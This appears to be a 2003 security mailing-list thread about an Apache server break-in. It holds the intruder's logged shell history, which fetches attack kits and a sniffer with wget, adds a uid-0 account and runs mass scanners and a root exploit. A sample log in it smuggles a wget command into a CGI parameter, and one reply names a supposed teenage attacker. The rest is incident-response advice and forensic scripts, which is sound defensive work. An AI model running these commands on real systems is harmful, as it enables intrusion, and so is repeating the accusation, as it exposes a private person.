Help, Help, Somebody help!!!
I Found somebody gain access using wwwrun, Download programs and try to hack into other server.
Follows found in error_log of apache
--09:41:10-- http://www.vulturul.org/vulturul/vulturu.tgz => `vulturu.tgz'
Resolving www.vulturul.org... done.
Connecting to www.vulturul.org[195.110.124.188]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 9,432 [application/x-tar]
0K ......... 100% 13.69 KB/s
09:41:17 (13.69 KB/s) - `vulturu.tgz' saved [9432/9432]
bind: Address already in use
bind: Address already in use
--09:33:57-- http://geocities.com/supers7ar/bin.tar.gz => `bin.tar.gz'
Resolving geocities.com... done.
Connecting to geocities.com[66.218.77.68]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 19,748 [application/x-gzip]
0K .......... ......... 100% 65.37 KB/s
09:33:59 (65.37 KB/s) - `bin.tar.gz' saved [19748/19748]
sh: line 1: ./bin.tar.gz: Permission denied
gzip: stdin: not in gzip format
tar: Child returned status 1
--15:50:22-- http://195.174.78.202/a.out => `a.out'
Resolving 195.174.78.202... done.
Connecting to 195.174.78.202:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 13,444 [text/plain]
0K .......... ... 100% 3.37 KB/s
15:50:27 (3.37 KB/s) - `a.out' saved [13444/13444]
sh: line 1: ./a.out: Permission denied
chmod: invalid mode string: `x'
sh: line 1: ./a.out: Permission denied
Bad syntax, perhaps a bogus '-'?
sh: line 1: cd: /tmp/vulturu: No such file or directory
--20:25:35-- http://www.vulturul.org/vulturul/vulturu.tgz => `vulturu.tgz'
Resolving www.vulturul.org... done.
Connecting to www.vulturul.org[195.110.124.188]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 9,432 [application/x-tar]
0K ......... 100% 13.67 KB/s
20:25:38 (13.67 KB/s) - `vulturu.tgz' saved [9432/9432]
tar: Error exit delayed from previous errors
sh: line 1: cd: /tmp/": No such file or directory
Also Found his command history:
id
/usr/sbin/adduser vulturul -u0 -g0 -M;
cd /usr/local/games/
ls -ax
wget www.vulturul.org/vulturul/bnc.tgz
cd /tmp/" "
socklist
killall -9 nsl
ls -ax
rm -rf epcs2
rm -rf ns
rm -rf nsl
rm -rf p
rm -rf pk
ls -ax
wget www.vulturul.org/vulturul/bnc.tgz
tar xvfz bnc.tgz
mv psybnc "~. "
cd "~. "
mv psybnc " "
export PATH=:PATH
./" "
id
ls --color
./li
ls --color
./p
exec ./p 8003
id
pwd
cd ..
cd ..
ls -ax
ls -ax --color
rm -rf edu.gz
rm -rf local.tar.gz
rm -rf local
cd 3du
ls --color
ls --color
./scan 200.13.230.37
./scan 200.13.230.37 -d 6
./scan 202.30.198.226 -d 6
/scan 202.186.250.157
./scan
./scan 202.186.250.157
./scan 202.186.250.157 -d 6
./scan 64.106.104.84 -d 6
./scan 64.106.104.84 -d 6
./scan 128.119.213.136 -d 2
d ..
cd ..
ls -ax
cd atd
ls -ax
./osslmass2 mass.log
./osslmass2 mass.log
cd ../atd
ls -ax
cd ..
ls -ax --color
pico
./pico
mv pico /usr/bin
pico
ls -ax
mv pico /usr/bin
cp pico /usr/bin/pico
cd 3du
ls -ax --color
cd ..
wget http://geocities.com/supers7ar/boom.tar.gz
tar xvfz boom.tar.gz
cd boom
ls -ax
./r00t
./r00t -t 193.231.142 -d 3
./r00t -t 193.231.142 -d 2
./r00t -t 193.231.142 -d 4
./r00t -t 193.231.142 -d 7
./r00t -t 193.231.142 -d 8
cd ..
pwd
wget http://geocities.com/supers7ar/sshup.tar.gz
tar xvfz sshup.tar.gz
cd ssh-3.0.1/
ls -ax
cd ..
rm -rf ssh-3.0.1/
rm -rf sshup.tar.gz
ls -ax --color
rm -rf boom.tar.gz
cd ~.
cd " ~.
q
q
}
q
exit
ls -ax
wget www.vulturul.org/vulturul/linsniffer
chmod +x linsniffer
./linsniffer
ls -ax
rm -rf linsniffer
ls -ax --color
id
./heh
./r00t -t 128.100.20 -d 8
./r00t -t 193.231.142 -d 3
./r00t -t 193.231.142 -d 2
./scan 200.13.230.37
Please help, I Can't found where he can get in~~!
--
Marco Lum
Net Service Manager
___________________________________________________________________________________________
System Development Service
Inter/Intra/Local-Area Networking Service
VOICE: +852 2851 1190 FAX: +852 2851 1109
Email: enquiry@hkservice.com WWWeb: http://www.hkservice.com
HK Service Company
HK Service Consultants Limited
UNPLUG the network cable and reinstall the machine on another NEW HDD (preserve the actual HDD for further forensic investigations) - but UNPLUG IT NOW!!!!!
----- Original Message -----
From: "Marco Lum"
-- Check the headers for your unsubscription address For additional commands, e-mail: suse-security-help@suse.com Security-related bug reports go to security@suse.de, not here
curiosity kills the cat:
http://www.vulturul.org/ = A Romanian guy, 18 years old, his name is Brisan Andrei :)
----- Original Message -----
From: "Marco Lum"
quote from "boom.tar.gz" (see if you find somethin' that sounds familiar):
WARNING, this is a powerful tool: you can gain root access on many systems.
Use it at your own risk.
It scans for vulnerabilities in different OS and daemons:
The BIND scan:
Gains root access on all nonpatched boxes running linux with the following bind versions:
ISC BIND 8.2
ISC BIND 8.2.1
ISC BIND 8.2.2
ISC BIND 8.2.2-P3
ISC BIND 8.2.2-P5
ISC BIND 8.2.2-P7
The LPD scan:
Gains root access on all nonpatched boxes running linux RedHat 7.0 with lpd from distribution.
The FTPD scan:
Gains root access on all nonpatched boxes running the following OS/ftp daemons:
Caldera eDesktop|eServer|OpenLinux 2.3 update [wu-ftpd-2.6.1-13OL.i386.rpm]
Debian potato [wu-ftpd_2.6.0-3.deb]
Debian potato [wu-ftpd_2.6.0-5.1.deb]
Debian potato [wu-ftpd_2.6.0-5.3.deb]
Debian sid [wu-ftpd_2.6.1-5_i386.deb]
Immunix 6.2 (Cartman) [wu-ftpd-2.6.0-3_StackGuard.rpm]
Immunix 7.0 (Stolichnaya) [wu-ftpd-2.6.1-6_imnx_2.rpm]
Mandrake 6.0|6.1|7.0|7.1 update [wu-ftpd-2.6.1-8.6mdk.i586.rpm]
Mandrake 7.2 update [wu-ftpd-2.6.1-8.3mdk.i586.rpm]
Mandrake 8.1 [wu-ftpd-2.6.1-11mdk.i586.rpm]
RedHat 5.0|5.1 update [wu-ftpd-2.4.2b18-2.1.i386.rpm]
RedHat 5.2 (Apollo) [wu-ftpd-2.4.2b18-2.i386.rpm]
RedHat 5.2 update [wu-ftpd-2.6.0-2.5.x.i386.rpm]
RedHat 6.? [wu-ftpd-2.6.0-1.i386.rpm]
RedHat 6.0|6.1|6.2 update [wu-ftpd-2.6.0-14.6x.i386.rpm]
RedHat 6.1 (Cartman) [wu-ftpd-2.5.0-9.rpm]
RedHat 6.2 (Zoot) [wu-ftpd-2.6.0-3.i386.rpm]
RedHat 7.0 (Guinness) [wu-ftpd-2.6.1-6.i386.rpm]
RedHat 7.1 (Seawolf) [wu-ftpd-2.6.1-16.rpm]
RedHat 7.2 (Enigma) [wu-ftpd-2.6.1-18.i386.rpm]
SuSE 6.0|6.1 update [wuftpd-2.6.0-151.i386.rpm]
SuSE 6.0|6.1 update wu-2.4.2 [wuftpd-2.6.0-151.i386.rpm]
SuSE 6.2 update [wu-ftpd-2.6.0-1.i386.rpm]
SuSE 6.2 update [wuftpd-2.6.0-121.i386.rpm]
SuSE 6.2 update wu-2.4.2 [wuftpd-2.6.0-121.i386.rpm]
SuSE 7.0 [wuftpd.rpm]
SuSE 7.0 wu-2.4.2 [wuftpd.rpm]
SuSE 7.1 [wuftpd.rpm]
SuSE 7.1 wu-2.4.2 [wuftpd.rpm]
SuSE 7.2 [wuftpd.rpm]
SuSE 7.2 wu-2.4.2 [wuftpd.rpm]
SuSE 7.3 [wuftpd.rpm]
SuSE 7.3 wu-2.4.2 [wuftpd.rpm]
Slackware 7.1
The SSHD scan:
Gains root access on all nonpatched boxes running the following versions:
Linux:
SSH-1.5-1.2.25
SSH-1.5-1.2.26
SSH-1.5-1.2.27
SSH-1.5-1.2.30
SSH-1.5-1.2.31
SSH-1.99-OpenSSH_2.2.0p1
SSH-1.5-OpenSSH-1.2
SSH-1.5-OpenSSH-1.2.2
SSH-1.5-OpenSSH-1.2.3
OpenBSD 3.x:
OpenSSH 2.9.9 - 33
The RPC scan:
Gains root access on multiple RPC vulnerabilities involving Linux/SunOS/Solaris.
The TELNED scan:
Gains root access on all nonpatched boxes running the following OS's:
Most of the BSD OS's
The POP3 scan:
Gains root access on all nonpatched boxes running QPOP 3.0b
For further upgrades send me new exploits at k1net1c@k1net1c.net
The SSL scan:
Gains access on almost all linux boxes running OpenSSL 0.9.6d and older.
Spawns a shell uid=apache.
----- Original Message -----
From: "Radu Voicu"
curiosity kills the cat:
http://www.vulturul.org/ = A romanian guy, 18years old, his name is Brisan Andrei :)
----- Original Message -----
From: "Marco Lum"
To: "suse-security"
Sent: Wednesday, September 03, 2003 7:43 PM
Subject: [suse-security] Apache Gain Remote Shell Access
Help, Help, Somebody help!!!
On Thu, Sep 04, 2003 at 12:43:07AM +0800, Marco Lum wrote:
Follows found in error_log of apache
--09:41:10-- http://www.vulturul.org/vulturul/vulturu.tgz => `vulturu.tgz' Resolving www.vulturul.org... done. Connecting to www.vulturul.org[195.110.124.188]:80... connected. HTTP request sent, awaiting response... 200 OK Length: 9,432 [application/x-tar]
0K ......... 100% 13.69 KB/s
09:41:17 (13.69 KB/s) - `vulturu.tgz' saved [9432/9432]
Wget output in apache error_log. Check for a CGI (shell script?) allowing clients to execute arbitrary commands.
Also Found his command history:
id /usr/sbin/adduser vulturul -u0 -g0 -M;
He has root access but is not sure about that?
At least two problems. Execution of commands as user wwwrun and local root compromise.
I hope the box has been disconnected from the network already.
--
Stefan Tichy
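Stefan's hint is that wget's progress output can only reach error_log if something Apache ran executed a shell command. The added script below (not from the thread) pairs each download in error_log with access_log requests close in time; a download with no request nearby is consistent with an entry that never produced an HTTP request line, as the OpenSSL exploit mentioned later in the thread would. Both logs are constructed samples (error_log lines modelled on Marco's mail, access_log entries invented), and access_log is assumed to be in Apache's common log format.

```shell
#!/bin/sh
# Constructed sample logs (not real data). ERROR_LOG mirrors the run-on wget
# lines Marco posted; ACCESS_LOG is invented for the correlation.
ERROR_LOG=$(cat <<'EOF'
--09:41:10-- http://www.vulturul.org/vulturul/vulturu.tgz => `vulturu.tgz' Resolving www.vulturul.org... done. Connecting to www.vulturul.org[195.110.124.188]:80... connected. HTTP request sent, awaiting response... 200 OK Length: 9,432 [application/x-tar]
09:41:17 (13.69 KB/s) - `vulturu.tgz' saved [9432/9432]
--15:50:22-- http://195.174.78.202/a.out => `a.out' Resolving 195.174.78.202... done. Connecting to 195.174.78.202:80... connected. HTTP request sent, awaiting response... 200 OK Length: 13,444 [text/plain]
sh: line 1: ./a.out: Permission denied
EOF
)
ACCESS_LOG=$(cat <<'EOF'
192.0.2.7 - - [03/Sep/2003:09:41:08 +0800] "GET /cgi-bin/whois.cgi?host=%3Bwget%20www.vulturul.org/vulturul/vulturu.tgz HTTP/1.0" 200 312
198.51.100.9 - - [03/Sep/2003:12:03:41 +0800] "GET /index.html HTTP/1.1" 200 4521
EOF
)

# One "HH:MM:SS URL file" triple per wget start line in error_log.
# $1 of such a line is "--HH:MM:SS--", $2 the URL, $4 the quoted file name.
downloads() {
    printf '%s\n' "$ERROR_LOG" |
    awk '/^--[0-9][0-9]:[0-9][0-9]:[0-9][0-9]-- /{ print substr($1, 3, 8), $2, $4 }' |
    tr -d "\`'"
}

# access_log lines whose time of day is within $2 seconds (default 30) of $1.
# Only the time of day is compared, because error_log's wget lines carry no date.
requests_near() {
    printf '%s\n' "$ACCESS_LOG" |
    awk -v t="$1" -v w="${2:-30}" '
        function secs(hms,  a) { split(hms, a, ":"); return a[1]*3600 + a[2]*60 + a[3] }
        {
            # $4 is "[03/Sep/2003:09:41:08"; the time is its last 8 characters
            stamp = substr($4, length($4) - 7)
            d = secs(stamp) - secs(t); if (d < 0) d = -d
            if (d <= w) print
        }'
}

# Summary: one line per download with the number of requests seen around it.
# Zero requests next to a download means the request log did not record the entry.
correlate() {
    downloads | while read -r t url file; do
        n=$(requests_near "$t" | wc -l | tr -d ' ')
        printf '%s %s from %s -> %s request(s) within 30s\n' "$t" "$file" "$url" "$n"
    done
}

correlate
```

On a real box, replace the two variables with `cat /var/log/apache/error_log` and `cat /var/log/apache/access_log` (paths vary by distribution) and widen the window if the clocks of the two logs are not the same process's.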
Checked, No Root access gen.
No CGI ACCESS - No log in access_log
No Shell Access by wwwrun
Play back his history, root access cannot be done
BTW, what the hell is "raver"?
Stefan Andreas Tichy wrote:
Checked, No Root access gen.
No CGI ACCESS - No log in access_log
No Shell Access by wwwrun
Not infected but Linux.RST.B (Scan all bin/sbin/user/bin also check by hand, No unknown outgoing connection)
Play back his history, root access cannot be done
All tasks stop when I stop apache
BTW, what the hell is "raver"?
Stefan Andreas Tichy wrote:
Marco Lum wrote:
Please help, I Can't found where he can get in~~!
i know several ways to break into such a system:
- installed PHP/Perl/CGI/whatever Script
- known FTP Account (anonymous?!) with access to webdirs
- Apache exploit (e.g. chunked bug)
- SSL Exploit
If your Box is well updated you can drop the last two possibilities (hopefully the box was ;). The others are well known flaws and, if you have a hosting box or so, you can't really control what other users install. Many scripts (whois etc.) don't really check for input. If it's your company's webserver you should know what's installed.
But like the others already said: unplug the box. Maybe you've the chance to check with chkrootkit (www.chkrootkit.org) if he had more access than the log shows.
HTH and if you've any further questions, drop a line (or two ;)
Sven
Marco Lum wrote:
Please help, I Can't found where he can get in~~!
Hm, unfortunately he/she knew what to do and where to find funny things!
!!!! Immediately unplug the server, plug in a backup server and analyse the system and don't switch off after that. !!!!<<
Looked for the sources on the mentioned websites: The hacker installed you a sniffer and can trace all your activity and passwds!
On the backup server log all connections! Don't shut it down - many activities can be resolved in tmp and memory (they still reside on that system). After analysing the intrusion and finding traces to the hacker you can set up your box new!
A hacker first wants to gain access and then install irc and/or news and/or an own warez or whatever ftp and/or hacks to hack other servers.
If you got rootkitted a "netstat -tap | grep LISTEN" or "| grep ESTABLISHED" will not help to find out (scan the server with another PC to find open ports instead).
First, which services, daemons and versions did you run? Which distro do you use?
Short Checklist<<
- check accounts in /etc/passwd and /etc/shadow
- check state of network connections with "netstat -tap"
- check state of network devices with "ifconfig" for promiscuous mode
- check logfiles (see later)
- check last users and logins with "last"
- check time of server - this may bring you problems, if this server syncs your net
- check configs of inetd/xinetd and other services
- find hack directories like "..." or " " with e.g.: find / -name "..."
- find last modified files with "ls -latrc" and check rpm-db (see later)
- probe for trojans or rootkits
Check for rootkits!<<
If you got rootkitted all analysis tools and some system commands are useless, because they are replaced and dysfunctional! Here's a small hint how to use:
Look at http://www.chkrootkit.org/ for further usage! Download chkrootkit.tar.gz from above website!
tar xvfz chkrootkit.tar.gz
cd chkrootkit
make
./chkrootkit > /root/chkrootkit.log
less /root/chkrootkit.log
Look, what you get as output and google for hints if you got one!
Check your rpm-db<<
rpm -Va > /root/system.checked
check your logfiles, especially look at the /var/log/xferlog for suspicious ftp transfers<<
mkdir /var/intl
cp /root/system.checked /var/intl
cp /root/chkrootkit.log /var/intl
fgrep -i attempt /var/log/messages >/var/intl/attempt-log
fgrep -i connect /var/log/messages >/var/intl/connects-log
fgrep -i refused /var/log/messages >/var/intl/refused-log
fgrep -i accepting /var/log/messages >/var/intl/accepted-log
fgrep -i su: /var/log/messages >/var/intl/su-log
fgrep -i unauthorized /var/log/messages >/var/intl/unauthorized-log
fgrep -i sshd /var/log/messages >/var/intl/sshd-log
fgrep -i illegal /var/intl/sshd-log >/var/intl/ssh-illegal-log
fgrep -i failed /var/intl/sshd-log >/var/intl/ssh-failed-log
aide --check >/var/intl/aide.log
tar kuip /var/intl/ -f intruders.tar
mount /dev/fd0 /mnt/floppy
cp intruders.tar /mnt/floppy
example of a log at an intruded server:
less connects-log<<
Jun 10 18:30:16 server in.telnetd[41354]: connect from hack@123.45.67.89
last<<
jens ttyp3 ppp-39.ba.net Tue Jun 10 20:01 - crash (00:01)
You find hints on who did something, if he/she wasn't nice enough to remove all traces.
check running processes<<
ps -ax > processes-log
Look in processes-log for suspicious filenames.
Here you can find additional infos:<<
examples of intruded system's logfiles: http://www.rz.rwth-aachen.de/kommunikation/security/s30.php#logfiles
a longer howto deintrude:
http://www.cert.org/tech_tips/intruder_detection_checklist.html
http://www.cert.org/tech_tips/root_compromise.html
http://www.cert.org/tech_tips/unix_configuration_guidelines.html
Philippe
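Three items of Philippe's checklist (odd directory names like "..." , " " and the "~. " seen in the posted history; recently changed files; interfaces in promiscuous mode) as plain sh functions. This is an added example, not part of the thread; the directory tree it scans is constructed in a temp dir, and the promiscuous-mode check assumes Linux's /sys/class/net/<if>/flags, where IFF_PROMISC is bit 0x100.

```shell
#!/bin/sh
# Constructed sample tree: one ordinary directory plus the three odd names
# an intruder in this thread used. A real sweep would pass / instead.
make_sample_tree() {
    root=$(mktemp -d)
    mkdir -p "$root/usr/local/games/~. " "$root/tmp/ " "$root/var/tmp/..." "$root/home/user/docs"
    : > "$root/usr/local/games/~. /psybnc"
    : > "$root/home/user/docs/notes.txt"
    printf '%s\n' "$root"
}

# Directories whose name is three or more dots, starts or ends with a blank,
# or starts with a tilde. Each hit is printed once, as a full path.
odd_dirs() {
    find "$1" -type d \( -name '...*' -o -name '* ' -o -name ' *' -o -name '~*' \) -print 2>/dev/null | sort
}

# Files whose inode changed in the last $2 minutes (default 60): ctime is what
# "ls -latrc" sorts by and is harder to reset than mtime.
recent_files() {
    find "$1" -type f -cmin "-${2:-60}" -print 2>/dev/null | sort
}

# $1 is the hex flags word from /sys/class/net/<if>/flags; IFF_PROMISC = 0x100.
# Succeeds (exit 0) when the interface is in promiscuous mode.
flag_is_promisc() {
    [ $(( $1 & 0x100 )) -ne 0 ]
}

# Names of interfaces currently in promiscuous mode (empty when none, or when
# not on Linux). A rootkit can hide this too, so treat an empty result as
# "nothing found", not "clean".
promisc_ifaces() {
    for f in /sys/class/net/*/flags; do
        [ -r "$f" ] || continue
        if flag_is_promisc "$(cat "$f")"; then
            basename "$(dirname "$f")"
        fi
    done
}

sample=$(make_sample_tree)
echo "odd directories:";      odd_dirs "$sample"
echo "recently changed files:"; recent_files "$sample"
echo "promiscuous interfaces:"; promisc_ifaces
rm -rf "$sample"
```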
participants (5)
- Marco Lum
- Philippe Vogel
- Radu Voicu
- Stefan Andreas Tichy
- Sven 'Darkman' Michels